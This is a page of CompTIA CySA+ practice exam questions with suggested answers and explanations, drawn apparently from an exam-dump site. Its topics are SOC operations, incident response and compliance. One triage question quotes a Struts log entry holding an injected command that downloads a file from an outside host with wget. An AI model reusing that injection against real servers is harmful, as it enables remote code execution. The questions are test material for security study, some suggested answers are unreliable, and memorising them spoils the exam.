ExamGecko
Search Search Login
Home Home / CompTIA / CS0-003

CompTIA CS0-003 Practice Test - Questions Answers, Page 33

Question list
Search
Search

List of questions

Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

An XSS vulnerability was reported on one of the public websites of a company. The security department confirmed the finding and needs to provide a recommendation to the application owner. Which of the following recommendations will best prevent this vulnerability from being exploited? (Select two).
An analyst is reviewing a dashboard from the company's SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events in the last two hours. The dashboard indicates that these events relate to TTPs. Which of the following is the analyst most likely using?
While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?
Which of the following is the best framework for assessing how attackers use techniques over an infrastructure to exploit a target's information assets?
An organization identifies a method to detect unexpected behavior, crashes, or resource leaks in a system by feeding invalid, unexpected, or random data to stress the application. Which of the following best describes this testing methodology?
A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware, based on its telemetry?
A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented?
A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?
The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?
The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools and systems to protect its data. Which of the following did the CISO most likely select?

Question 321

Report
Export
Collapse

An MSSP received several alerts from customer 1, which caused a missed incident response deadline for customer 2. Which of the following best describes the document that was violated?

A.
KPI
A.
KPI
Answers
B.
SLO
B.
SLO
Answers
C.
SLA
C.
SLA
Answers
D.
MOU
D.
MOU
Answers
Suggested answer: C

Explanation:

The document that was violated in this scenario is the SLA (Service Level Agreement). An SLA is a formal agreement between a service provider and a customer that defines the level of service expected. It includes specific metrics such as response times and resolution times. Missing an incident response deadline for customer 2 due to alerts from customer 1 indicates a breach of the agreed-upon service levels outlined in the SLA.

Question 322

Report
Export
Collapse

A SOC analyst determined that a significant number of the reported alarms could be closed after removing the duplicates. Which of the following could help the analyst reduce the number of alarms with the least effort?

A.
SOAR
A.
SOAR
Answers
B.
API
B.
API
Answers
C.
XDR
C.
XDR
Answers
D.
REST
D.
REST
Answers
Suggested answer: A

Explanation:

Security Orchestration, Automation, and Response (SOAR) can help the SOC analyst reduce the number of alarms by automating the process of removing duplicates and managing security alerts more efficiently. SOAR platforms enable security teams to define, prioritize, and standardize response procedures, which helps in reducing the workload and improving the overall efficiency of incident response by handling repetitive and low-level tasks automatically.

Question 323

Report
Export
Collapse

A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path traversal, and cross-site scripting. Which of the following tools would the security team most likely recommend to perform this test?

A.
Has heat
A.
Has heat
Answers
B.
OpenVAS
B.
OpenVAS
Answers
C.
OWASP ZAP
C.
OWASP ZAP
Answers
D.
Nmap
D.
Nmap
Answers
Suggested answer: C

Explanation:

OWASP ZAP (Zed Attack Proxy) is a tool recommended for quickly testing web applications for vulnerabilities, including SQL injection, path traversal, and cross-site scripting. It is an open-source web application security scanner that helps identify security issues in web applications during the development and testing phases.

Question 324

Report
Export
Collapse

An organization has a critical financial application hosted online that does not allow event logging to send to the corporate SIEM. Which of the following is the best option for the security analyst to configure to improve the efficiency of security operations?

A.
Configure a new SIEM specific to the management of the hosted environment.
A.
Configure a new SIEM specific to the management of the hosted environment.
Answers
B.
Subscribe to a threat feed related to the vendor's application.
B.
Subscribe to a threat feed related to the vendor's application.
Answers
C.
Use a vendor-provided API to automate pulling the logs in real time.
C.
Use a vendor-provided API to automate pulling the logs in real time.
Answers
D.
Download and manually import the logs outside of business hours.
D.
Download and manually import the logs outside of business hours.
Answers
Suggested answer: C

Question 325

Report
Export
Collapse

Which of the following will most likely cause severe issues with authentication and logging?

A.
Virtualization
A.
Virtualization
Answers
B.
Multifactor authentication
B.
Multifactor authentication
Answers
C.
Federation
C.
Federation
Answers
D.
Time synchronization
D.
Time synchronization
Answers
Suggested answer: D

Explanation:

Time synchronization issues can cause severe problems with authentication and logging. If system clocks are not properly synchronized, it can lead to discrepancies in log timestamps, making it difficult to correlate events across different systems. Additionally, time-related discrepancies can affect authentication mechanisms that rely on time-based tokens, such as those used in multifactor authentication, leading to failures and security gaps.

Question 326

Report
Export
Collapse

A regulated organization experienced a security breach that exposed a list of customer names with corresponding PH data. Which of the following is the best reason for developing the organization's communication plans?

A.
For the organization's public relations department to have a standard notification
A.
For the organization's public relations department to have a standard notification
Answers
B.
To ensure incidents are immediately reported to a regulatory agency
B.
To ensure incidents are immediately reported to a regulatory agency
Answers
C.
To automate the notification to customers who were impacted by the breach
C.
To automate the notification to customers who were impacted by the breach
Answers
D.
To have approval from executive leadership on when communication should occur
D.
To have approval from executive leadership on when communication should occur
Answers
Suggested answer: B

Explanation:

Developing an organization's communication plans is crucial to ensure that incidents, especially those involving sensitive data like PH (Protected Health) data, are promptly reported to the relevant regulatory agencies. This is essential for compliance with legal and regulatory requirements, which often mandate timely notification of data breaches. Effective communication plans help the organization manage the breach response process, mitigate potential legal penalties, and maintain transparency with regulatory bodies.

Question 327

Report
Export
Collapse

Which of the following explains the importance of a timeline when providing an incident response report?

A.
The timeline contains a real-time record of an incident and provides information that helps to simplify a postmortem analysis.
A.
The timeline contains a real-time record of an incident and provides information that helps to simplify a postmortem analysis.
Answers
B.
An incident timeline provides the necessary information to understand the actions taken to mitigate the threat or risk.
B.
An incident timeline provides the necessary information to understand the actions taken to mitigate the threat or risk.
Answers
C.
The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken.
C.
The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken.
Answers
D.
An incident timeline presents the list of commands executed by an attacker when the system was compromised, in the form of a timetable.
D.
An incident timeline presents the list of commands executed by an attacker when the system was compromised, in the form of a timetable.
Answers
Suggested answer: C

Explanation:

An incident response timeline is a detailed chronological record of all events and actions taken during the response to a security incident. It includes timestamps and descriptions of each step, providing a comprehensive overview of how the incident was detected, contained, mitigated, and resolved. This timeline is crucial for post-incident analysis, helping to understand the effectiveness of the response, identify areas for improvement, and ensure accountability and transparency in the incident handling process.

Question 328

Report
Export
Collapse

An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is the first step for the security team to take to ensure compliance with the request?

A.
Publicly disclose the request to other vendors.
A.
Publicly disclose the request to other vendors.
Answers
B.
Notify the departments involved to preserve potentially relevant information.
B.
Notify the departments involved to preserve potentially relevant information.
Answers
C.
Establish a chain of custody, starting with the attorney's request.
C.
Establish a chain of custody, starting with the attorney's request.
Answers
D.
Back up the mailboxes on the server and provide the attorney with a copy.
D.
Back up the mailboxes on the server and provide the attorney with a copy.
Answers
Suggested answer: B

Explanation:

The first step for the security team when receiving a legal hold request is to notify the relevant departments to preserve all potentially relevant information. This ensures that no data is altered, deleted, or otherwise tampered with, which is critical for maintaining the integrity of the evidence. Preserving information includes emails, documents, and any other data that might be relevant to the legal matter. Establishing a chain of custody and backing up data are also important steps, but notifying the involved parties is the immediate priority to prevent data loss.


Question 329

Report
Export
Collapse

An incident response team member is triaging a Linux server. The output is shown below:

$ cat /etc/passwd

root:x:0:0::/:/bin/zsh

bin:x:1:1::/:/usr/bin/nologin

daemon:x:2:2::/:/usr/bin/nologin

mail:x:8:12::/var/spool/mail:/usr/bin/nologin

http:x:33:33::/srv/http:/bin/bash

nobody:x:65534:65534:Nobody:/:/usr/bin/nologin

git:x:972:972:git daemon user:/:/usr/bin/git-shell

$ cat /var/log/httpd

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241)

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)

WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)

at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334)

at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)

Which of the following is the adversary most likely trying to do?

A.
Create a backdoor root account named zsh.
A.
Create a backdoor root account named zsh.
Answers
B.
Execute commands through an unsecured service account.
B.
Execute commands through an unsecured service account.
Answers
C.
Send a beacon to a command-and-control server.
C.
Send a beacon to a command-and-control server.
Answers
D.
Perform a denial-of-service attack on the web server.
D.
Perform a denial-of-service attack on the web server.
Answers
Suggested answer: B

Explanation:

The log output indicates an attempt to execute a command via an unsecured service account, specifically using a wget command to download a file from an external source. This suggests that the adversary is trying to exploit a vulnerability in the web server to run unauthorized commands, which is a common technique for gaining a foothold or further compromising the system. The presence of wget http://grohl.ve.da/tmp/brkgtr.zip indicates an attempt to download and possibly execute a malicious payload.

Question 330

Report
Export
Collapse

A SOC analyst observes reconnaissance activity from an IP address. The activity follows a pattern of short bursts toward a low number of targets. An open-source review shows that the IP has a bad reputation. The perimeter firewall logs indicate the inbound traffic was allowed. The destination hosts are high-value assets with EDR agents installed. Which of the following is the best action for the SOC to take to protect against any further activity from the source IP?

A.

Add the IP address to the EDR deny list.

A.

Add the IP address to the EDR deny list.

Answers
B.

Create a SIEM signature to trigger on any activity from the source IP subnet detected by the web proxy or firewalls for immediate notification.

B.

Create a SIEM signature to trigger on any activity from the source IP subnet detected by the web proxy or firewalls for immediate notification.

Answers
C.

Implement a prevention policy for the IP on the WAF

C.

Implement a prevention policy for the IP on the WAF

Answers
D.

Activate the scan signatures for the IP on the NGFWs.

D.

Activate the scan signatures for the IP on the NGFWs.

Answers
Suggested answer: A

Explanation:

In this scenario, adding the IP address to the EDR (Endpoint Detection and Response) deny list is an immediate and effective way to block further reconnaissance activities from the malicious source. EDR solutions are designed to provide advanced endpoint security, including blocking specific IP addresses and preventing potentially harmful traffic. This proactive step aligns with CompTIA Cybersecurity Analyst (CySA+) best practices for threat prevention and response. While other options, such as using SIEM for monitoring (option B) or WAF policies (option C), provide additional layers of security, they do not directly block the threat in the same immediate way that adding the IP to the EDR deny list does.

Total 368 questions
Go to page: of 37
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms